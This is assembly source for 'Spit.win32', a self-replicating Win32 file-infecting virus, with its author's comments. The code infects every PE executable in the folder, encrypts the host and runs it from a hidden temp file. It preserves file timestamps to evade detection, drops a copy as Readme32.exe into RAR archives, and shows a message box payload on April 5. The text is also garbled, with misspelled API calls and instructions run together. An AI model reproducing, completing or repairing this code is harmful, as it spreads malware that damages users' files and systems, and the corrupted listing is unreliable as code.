;
Spit.win32 Rev2.1
A BumbleBee Win32 Virus
;
, Yeah! It's SIMPLE But Full Win32 Compatible -i Think-. A Non-Resident
Win32 Virus Using Ffirst 'n' FNEXT.
;. Copies INTO HOST: Virus Host. When Host Execs Copies Host To
; Temporary File And Execs It. Then Waits Until Exec Ends To Delete
The TMP File. It's like a spit: Petty But Annoying If Falls over You;)
;
Is My 1st PE Virus and Can Be Improved -See Icons On Infected Files-.
But Spit Uses a Simple Way To Infect!
;
Notes:
- Uses Winexec 'Cause CreateProcess Is More Complex.
; - virus size is 8192 bytes (Code Data HEADERS ...)
; - Marks DOS Header with 'HK' on Infected Files
; - Makes a Semi-Random Name for TMP File
;
What's new on rev2?
;
; - Only Infect PE Files
; - EXEC HOST BEFORE INFECT
; - BEST Random TMP Name
; - Hide Tmp Host With Hidden Attribute While EXEC
; - Encrypts Host -Fuck you avers;
; - no file time change
; - Uses CD13 Routines to Drop over Rar File - Thanx CD13! -
;
;. What's new on rev2.1?
; - a stupid error fixed -winexec 1st push must be 1: (-
;
;
Thanx To ...
;
; ... 29a for e-zines, cd13 for His Cool Stuff, And Lethal for
Find A Bug When I Think IT Was Finished ...
;
;
; The Way of the BEE
;
Yeah Lich ... win32 programing is:
;
; Push Shit
Push moreeshit
; Push toomuchshit
Call Wincoestohell
;
;
Tasm / ml / m3 v32,
; TLINK32 -TPE -C V32, V32, IMPORT32.LIB
;
.386
Locals
Jumps
.Model flat, stdcall
; procs to import
EXTRN EXITPROCESS: PROC
EXTRN CREATEFILEA: PROC
EXTRN WRITEFILE: PROC
EXTRN CLOSEHANDLE: PROC
EXTRN FINDFIRSTFILEA: PROC
EXTRN FINDNEXTFILEA: PROC
EXTRN READFILE: PROC
Extrn getcommandlinea: Procextrn Virtualaloc: Proc
EXTRN VIRTUALFREE: PROC
EXTRN Messageboxa: Proc
EXTRN _LLSEEK: PROC
EXTRN GETFILESIZE: PROC
EXTRN Deletefilea: Proc
EXTRN WINEXEC: PROC
EXTRN LSTRCPY: PROC
EXTRN LSTRCAT: PROC
EXTRN GETSYSTEMTIME: Proc
EXTRN SETFILEATTRIBUTESA: PROC
EXTRN GETFILETIME: Proc
EXTRN SETFILETIME: Proc
; from BC Win32 API ON-LINE REFERENCE
Win32_find_data struct
DWFileAttributes DD 0
DWLOWDATETIME0 DD?; CREATION
DWHIGDATETIME0 DD?
DWLOWDATETIME1 DD?; Last Access
DWHIGDATETIME1 DD?
DWLOWDATETIME2 DD?; Last Write
DWHIGDATETIME2 DD?
NFILESIZEHIGH DD?
NFILESZELOW DD?
DWRESERVED DD 0,0
CFileName DB 260 DUP (0)
CalternateFileName DB 14 DUP (0)
DB 2 DUP (0)
WIN32_FIND_DATA ENDS
Struc from 29a incnad ... Thanx you a lot!
Image_dos_header struct
MZ_MAGIC DW?; MAGIC NUMBER
MZ_CBLP DW?; BYTES ON LAST Page Of File
MZ_CP DW?; Pages In File
MZ_CRLC DW?; Relocations
MZ_CPARHDR DW?; SIZE OF Header in Paragraphs
MZ_MINALLOC DW?; Minimum Extra Paragraphs Needed
MZ_MAXALLOC DW?; Maximum Extra paragraphs needed
MZ_SS DW?; Initial (Relative) SS Value
MZ_SP DW?; Initial SP Value
MZ_CSUM DW?; Checksum
MZ_IP DW?; Initial IP Value
MZ_CS DW?; Initial (Relative) CS Value
MZ_LFARLC DW?; File Address of Relocation Table
MZ_ovno dw?; Overlay number
MZ_RES DW 4 DUP (?); Reserved Words
MZ_OEMID DW?; OEM Identifier (for e_oeminfo)
MZ_OEMINFO DW?; OEM Information; E_OEMID Specific
MZ_RES2 DW 10 DUP (?); Reserved words
MZ_LFANEW DD?; File Address of New Exe HEADER
Image_dos_header ends
Image_sizeof_dos_header EQU SIZE Image_DOS_HEADER
; For Rar Drop
Headersize EQU FinRarheader-Rarheader
Size EQU 8192
.DATA
DOS_HEADER image_DOS_HEADER ; for inf check testfind_data win32_find_data ; for ffirst 'n' Fnext
Fmask: DB '* .exe', 0; Mask for EXE
Ffhnd: DD?; Ff'n'fn Handle
FHND: DD?; File Handle
MHND: DD?; MEMORY HANDLE
MTHND: DD?; TMP MEMORY HANDLE
MTAHND: DD?; TMP MEMORY HANDLE for ARGS
CommandLine: DD?; you know ...
HARGS: DB?; FLAG for HAS ARGS
Argspos: DD?; POS of Args in cmd line
Fsize: DD?; TMP Size Of File
Size2read DD 0; Used for r / w Ops
Titleb DB 'Virus Report Rev2.1', 0
Vid db 'spit.win32 is a bumblebee win32 Virus', 0ah, 0DH
Mess db 0ah, 0dh, 'feel the power of spain and die by the spit!'
DB 0AH, 0DH, 0
TMPHOST DB 'BBBEE'
RNDHOST DB '000000.EXE', 0
Execstatus: DB 0; Status After EXEC
SYSTIMESTRUCT DB 16 DUP (0)
Data for Save Time
STFHND DD?
Time0 DD 0,0
Time1 DD 0,0
Time2 DD 0,0
SERR DB 0
Data for rar Drop by CD13
Dmask: DB '* .rar', 0; Mask for Rar
Number DD 0
Rarheader:; Header That We Will Add
RarheaderCrc DW 0; We'll Fill: CRC of Header
Rartype DB 074H; File Header
RARFLAGS DW 8000H
Rarheadsize dw headersize
RARCOMPRESSED DD SIZE; Compressed and Original
Raroriginal DD Size; Size Are the Same, We Stored
Raros DB 0; OS: MS-DOS
RARCRC32 DD 0; We Must Fill this field
RARFILETIME DB 063H, 078H; Time of the Program
RARFILEDATE DB 031H, 024H; Date of the Proggy
Rarneedver DB 014H
RarMethod DB 030H; Method: Storing
RarfnameSize DW FinRarheader-RarName
RARATTRIB DD 0
Rarname DB "Readme32.exe"; Name of File to Drop
FinRarheader Label Byte
.Code
INICIO:
Lea Eax, SystimeStruct; Check for payload
Push EAX
Call getSystemTime
Lea Eax, SystimeStruct; April 5
CMP Word PTR [EAX 2], 4
JNE SkipPay
CMP Word PTR [EAX 6], 5
JNE SkipPay
Push 1000h; Petty PayLoad
Lea Eax, Titleb
Push EAX
Lea Eax, VID
Push EAX
PUSH 0
Call Messageboxa
SkipPay:
Call getcommandlinea; Get Command Line
Mov DWORD PTR [CommandLine], EAX
Skipargs:; Skip Args
CMP DWORD PTR [EAX], 'EXE.'
Je argsok
INC EAX
JMP Skipargs
Argsok:
Add Eax, 4
CMP Byte Ptr [EAX], 0
JNE Hasargs
Mov Byte Ptr Hargs, 0
JMP Shargs
Hasargs:
MOV BYTE PTR [EAX], 0
Mov Byte Ptr Hargs, 1
Mov DWORD PTR [Argspos], EAX
SHASARGS:
Call Exechoste; Exec Host
Push 00000004h; Read / Write Page
Push 00001000H; MEM Commit (Reserve Phys Mem)
Push 8192; Size to Alloc
Push 0h; Let System Decide Where to Alloc
Call Virtualalloc
CMP EAX, 0
JE JUSTOUT; OPS ... NOT MEMORY TO Alloc?
Mov DWORD PTR [MHND], EAX
XOR EAX, EAX
Push EAX
Push 00000080H
Push 3
Push EAX
Push 00000001H
Push 80000000H
MOV EAX, DWORD PTR [CommandLine]
Push EAX
Call CreateFilea; Open OWN File for Read (Shared)
CMP EAX, -1
JE justout; error: we can't infect ..snif ..
Mov DWORD PTR [FHND], EAX; Save Handle
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
PUSH 8192
Push dword PTR [MHND]
Push DWORD PTR [fhnd]
Call readfile; read vx from hoste
Mov Eax, DWORD PTR Size2Read
CMP EAX, 0
Je Justout
MOV EAX, DWORD PTR [MHND]
Add Eax, 12h
MOV Word Ptr [EAX], 'KH'; Infection SIGN
; --only needed in 1st infection-
; But ...
HOWNCLOSE:
MOV Eax, DWORD PTR [fHnd]; Close Own File
Push EAX
Call Closehandle
Lea Eax, Find_Data; Find first * .exe
Push EAX
Lea Eax, Fmask
Push EAX
Call FindfirstFilea
CMP EAX, -1
Je goout
Mov DWORD PTR [ffhnd], EAX
FNEXT:
Call Checkfile; Check File Before Infection Process
JC NOINFECTCALL INFECTFILE
NOINFECT:
Lea Eax, Find_Data; Find next * .exe
Push EAX
MOV EAX, DWORD PTR [ffhnd]
Push EAX
Call FindnextFilea
CMP EAX, 0
JNE FNEXT
MOV Eax, DWORD PTR [ffhnd]; Close FFist / Fnext Handle
Push EAX
Call Closehandle
Goout:
Lea Eax, Find_Data; Find First * .rar
Push EAX
Lea Eax, Dmask
Push EAX
Call FindfirstFilea
CMP EAX, -1
Je Justout
Mov DWORD PTR [ffhnd], EAX
Fnextrar:
Call Savetime
Call Drop
CMP BYTE PTR [SERR], 1
JE FINDNEXTRAR
Call Restoretime
FINDNEXTRAR:
Lea Eax, Find_Data; Find next * .rar
Push EAX
MOV EAX, DWORD PTR [ffhnd]
Push EAX
Call FindnextFilea
CMP EAX, 0
JNE FNEXTRAR
MOV Eax, DWORD PTR [ffhnd]; Close FFist / Fnext Handle
Push EAX
Call Closehandle
Justout:
CMP BYTE PTR [EXECSTATUS], 0; ERROR While EXEC HOST?
JE Skipdelloop
Delloop:
Lea Eax, TMPHOST
Push Eax; Delete TMP HOSTE
Call Deletefilea
CMP EAX, 0
Je Delloop; Wait Until Exec Ends
Skipdelloop:
Push 0h; exit
Call EXITPROCESS
JMP Skipdelloop
Checkfile:; Checks file
Push Edx
Lea Edx, Find_Data.cfileName
Call testifpe
POP EDX
JC Checkerrout
MOV AX, Word PTR DOS_HEADER.MZ_CSUM
CMP AX, 'KH'
Je Checkerrout; Check if it's infected yet
Checkout:
CLC
RET
CheckerRout:
STC
RET
Testifpe:
XOR EAX, EAX
Push EAX
Push 00000080H
Push 3
Push EAX
Push 00000001H
Push 80000000H
Push Edx
Call createfilea; Open file for read (Shared)
CMP EAX, -1
Je Loadherrout
Mov DWORD PTR [FHND], EAX; Save Handle
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
Push image_sizeof_dos_header
Lea Eax, Dos_Header
Push EAX
Push DWORD PTR [fhnd]
Call readfile; read dos header
Mov Eax, DWORD PTR Size2Read
CMP EAX, 0
Je Loadherrout
MOV AX, Word PTR [DOS_HEADER.MZ_MAGIC]
Add Al, AHCMP Al, 'M' 'Z'; Check It's A EXE
JNE Loadherrout
PUSH 0
Push DWORD PTR [DOS_HEADER.MZ_LFANEW]
Push DWORD PTR [fhnd]
Call _llseek; lseek to begin of peheader
CMP EAX, -1
Je Loadherrout
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
Push 2
Lea Eax, Dos_Header
Push EAX
Push DWORD PTR [fhnd]
Call Readfile; Read PE SIGN
Mov Eax, DWORD PTR Size2Read
CMP EAX, 0
Je Loadherrout
MOV AX, Word PTR [DOS_HEADER.MZ_MAGIC]
Add Al, AH
CMP Al, 'P' 'E'; Check IT's A PE
JNE Loadherrout
Mov Eax, DWORD PTR [FHND]; Close File
Push EAX
Call Closehandle
CLC
RET
Loadherrout:
Mov Eax, DWORD PTR [FHND]; Close File
Push EAX
Call Closehandle
STC
RET
Infectfile:
Call Savetime; Save Time of File
XOR EAX, EAX
Push EAX
Push 00000080H
Push 3
Push EAX
Push 00000001h 00000002H
Push 40000000h OR 80000000H
Lea Eax, Find_Data.cfilename
Push EAX
Call CreateFilea; Open File for r / w (Shared)
CMP EAX, -1
JE inferroutnc
Mov DWORD PTR [FHND], EAX; Save Handle
PUSH 0
Push EAX
Call getFileSize
CMP EAX, -1
JE InferRoutc
Mov DWORD PTR [FSIZE], EAX; Save Size of File
Push 00000004h; Read / Write Page
Push 00001000H; MEM Commit (Reserve Phys Mem)
Push Eax; Size to Alloc
Push 0h; Let System Decide Where to Alloc
Call Virtualalocc; Alloc Memory for Future Hoste
CMP EAX, 0
JE InferRoutc; OPS ... NOT MEMORY TO ALLOC?
Mov DWORD PTR [MTHND], EAX
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
Push dword PTR [fsize]
Push DWORD PTR [MTHND]
Push DWORD PTR [fhnd]
Call readfile; read fulure hoste
Mov Eax, DWORD PTR Size2Read
CMP EAX, 0
JE InferRoutc
PUSH 0
PUSH 0
Push DWORD PTR [fhnd]
Call _llseek; Lseek to Begin of File
CMP EAX, -1
JE InferRoutc
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
PUSH 8192
Push dword PTR [MHND]
Push DWORD PTR [fhnd]
Call writefile; Write Virii
Call Encrypt; Encrypt Hoste
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
Push dword PTR [fsize]
Push DWORD PTR [MTHND]
Push DWORD PTR [fhnd]
Call Writefile; Write Future Hoste
Push 00004000H
Push dword PTR [fsize]
Push DWORD PTR [MTHND]
Call VirtualFree; Free Future Host Mem
InferRoutc:
Mov Eax, DWORD PTR [FHND]; Close File
Push EAX
Call Closehandle
InferRoutnc:
CMP Byte PTR [SERR], 0
JNE SkipRestoretime
Call Restoretime
SkipRestoretime:
RET
EXECHOSTE:
XOR EAX, EAX
Push EAX
Push 00000080H
Push 3
Push EAX
Push 00000001H
Push 80000000H
MOV EAX, DWORD PTR [CommandLine]
Push EAX
Call CreateFilea; Open Host File For Read (Shared)
CMP EAX, -1
JE EXEERROUTNC
Mov DWORD PTR [FHND], EAX; Save Handle
PUSH 0
Push EAX
Call getFileSize
CMP EAX, -1
JE EXEERROUTC
SUB Eax, 8192; Sub Virus Size
Mov DWORD PTR [FSIZE], EAX; Save Size of File
Push 00000004h; Read / Write Page
Push 00001000H; MEM Commit (Reserve Phys Mem)
Push Eax; Size to Alloc
Push 0h; Let System Decide Where to Alloc
Call Virtualalocc; Alloc Memory for Hoste
CMP EAX, 0
JE EXEERROUTC; OPS ... NOT MEMORY TO ALLOC?
Mov DWORD PTR [MTHND], EAX
PUSH 0
PUSH 8192
Push DWORD PTR [fhnd]
Call _llseek; lseek to hoste of file
CMP EAX, -1
JE EXEERROUTC
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
MOV EAX, DWORD PTR [fsize]
Push EAX
Push DWORD PTR [MTHND]
Push DWORD PTR [fhnd]
Call readfile; read hoste
Mov Eax, DWORD PTR Size2Read
CMP EAX, 0
JE EXEERROUTC
Mov Eax, DWORD PTR [FHND]; Close File
Push EAX
Call CloseHandlecall ENCRYPT; Dencrypt Hoste
MOV ECX, 6
Mov Edx, Offset Rndhost
Looprnd:
Call Getrandom; Make a Random TMP Name
MOV BYTE PTR [EDX], Al
Inc EDX
Loop looprnd
XOR EAX, EAX
Push EAX
Push 00000020H; Archive
Push 1
Push EAX
Push 00000001h 00000002H
Push 40000000H
Lea Eax, TMPHOST
Push EAX
Call createfilea; Open new file for write (shared)
CMP EAX, -1
JE EXEERROUTNC
PUSH 0
Mov DWORD PTR [Size2Read], 0
Lea Eax, Size2Read
Push EAX
MOV EAX, DWORD PTR [fsize]
Push EAX
Push DWORD PTR [MTHND]
Push DWORD PTR [fhnd]
Call writefile; Write Hoste
Mov Eax, DWORD PTR [FHND]; Close File
Push EAX
Call Closehandle
Push 00004000H
Push dword PTR [fsize]
Push DWORD PTR [MTHND]
Call VirtualFree; Free Future Host Mem
Push 00000004h; Read / Write Page
Push 00001000H; MEM Commit (Reserve Phys Mem)
Push 1024; Size to Alloc
Push 0h; Let System Decide Where to Alloc
Call Virtualalocc; Alloc Memory for Hoste
CMP EAX, 0
JE EXEERROUTNC; OPS ... NOT MEMORY TO ALLOC?
Mov DWORD PTR [MTAHND], EAX
Lea Eax, TMPHOST
Push EAX
MOV EAX, DWORD PTR [MTAHND]
Push EAX
Call lstrcpy; make a commnd line
CMP Byte Ptr [Hargs], 0; IT Has Not Arguments
JE EXECNOW
MOV Eax, DWORD PTR [Argspos]
MOV BYTE PTR [EAX], ''
Push EAX
MOV EAX, DWORD PTR [MTAHND]
Push EAX
Call lstrcat; add arguments
Execnow:
Push 1
MOV EAX, DWORD PTR [MTAHND]
Push Eax; EXEC TMP HOSTE
Call Winexec
MOV BYTE PTR [EXECSTATUS], 1
Push 2
Lea Eax, TMPHOST
Push EAX
Call setFileAttributesa; Hide file
RET
ExeerRoutc:
Mov Eax, DWORD PTR [FHND]; Close File
Push EAX
Call Closehandle
ExeerRoutnc:
RET
Getrandom:
IN Al, 40h
CMP Al, 65
JB Getrandom
CMP Al, 90
Ja Getrandom
RET
ENCRYPT:
MOV EDI, DWORD PTR [MTHND]
MOV EAX, DWORD PTR [fsize]; Use size low byte as ckeymov ECX, DWORD PTR [fsize]
Encryptloop:
XOR BYTE PTR [EDI], Al
Inc EDI
Loop encryptloop
RET
Savetime:
XOR EAX, EAX
Push EAX
Push 00000080H
Push 3
Push EAX
Push 00000001H
Push 80000000H
Lea Eax, Find_Data.cfilename
Push EAX
Call CreateFilea; Open OWN File for Read (Shared)
CMP EAX, -1
Je Saveerr; Error: We can't save time
Mov DWORD PTR [stfhnd], EAX
Lea Eax, Time2
Push EAX
Lea Eax, Time1
Push EAX
Lea Eax, Time0
Push EAX
Push DWORD PTR [stfhnd]
Call getFiletime
MOV EAX, DWORD PTR [stfhnd]; Close File
Push EAX
Call Closehandle
MOV BYTE PTR [SERR], 0
RET
Saveerr:
MOV BYTE PTR [SERR], 1
RET
RESTORETIME:
XOR EAX, EAX
Push EAX
Push 00000080H
Push 3
Push EAX
Push 00000001H
Push 40000000H
Lea Eax, Find_Data.cfilename
Push EAX
Call CreateFilea; Open OWN File for Read (Shared)
CMP EAX, -1
Je Restoreerr; error: We can't restore Time
Mov DWORD PTR [stfhnd], EAX
Lea Eax, Time2
Push EAX
Lea Eax, Time1
Push EAX
Lea Eax, Time0
Push EAX
Push DWORD PTR [stfhnd]
Call setFiletime
MOV EAX, DWORD PTR [stfhnd]; Close File
Push EAX
Call Closehandle
RESTOREERR:
RET
; CD13 Routines Modified for Spit -cool Routines! -
Drop:
XOR EAX, EAX; Open Rar File
Push EAX
Push 00000080H
Push 3
Push EAX
Push EAX
Push 40000000H
Lea Eax, Find_Data.cfilename
Push EAX
Call Createfilea
CMP EAX, -1
Je Droperr
Mov DWORD PTR [FHND], EAX
XOR EAX, EAX
Push 02
Push Eax; Move Pointer to EOF
Push DWORD PTR [fhnd]
Call _llseek
MOV ESI, DWORD PTR [MHND]
Mov EDI, SIZE; GET CRC32 of the Program
Call CRC32; That We'll Drop
Mov DWORD PTR [RARCRC32], EAX; Save the CRC
MOV ESI, Offset Rarheader 2
Mov Edi, Headersize-2
Call CRC32; Get CRC32 of the Headermov Word Ptr [RarheaderCrc], AX
XOR EAX, EAX
Push EAX
Push Offset Number; Number of Bytes Written
Push headersize
Push Offset Rarheader; Write the Header
Push DWORD PTR [fhnd]
Call writefile
Mov Word PTR [RarheaderCrc], 0
Mov Word Ptr [Rarcrc32], 0; Blank There Fields
MOV Word PTR [RARCRC32 2], 0
PUSH 0
Push Offset Number
Push size
Push DWORD PTR [MHND]; Drop The File
Push DWORD PTR [fhnd]
Call writefile
Push DWORD PTR [FHND]; Close IT
Call Closehandle
DROPERR:
RET
CRC32: CLD; ROUTINE EXTRACTED FROM VECNA's
Push Ebx; Inca Virus! Muito Brigado, Friend!
MOV ECX, -1; Calculate CRC32 At Runtime, NO
MOV EDX, ECX; Need of Big Tables.
Nextbytecrc:
XOR EAX, EAX
XOR EBX, EBX
Lodsb
XOR Al, Cl
MOV CL, CH
MOV CH, DL
MOV DL, DH
MOV DH, 8
NextbitCrc:
SHR BX, 1
RCR AX, 1
JNC NOCRC
XOR AX, 08320H
XOR bx, 0edb8h
NOCRC: DEC DH
JNZ nextbitCrc
XOR ECX, EAX
XOR EDX, EBX
Dec di
Jnz nextbytecrc
Not Edx
NOT ECX
POP EBX
MOV EAX, EDX
ROL EAX, 16
MOV AX, CX
RET
ENDS
End inicio
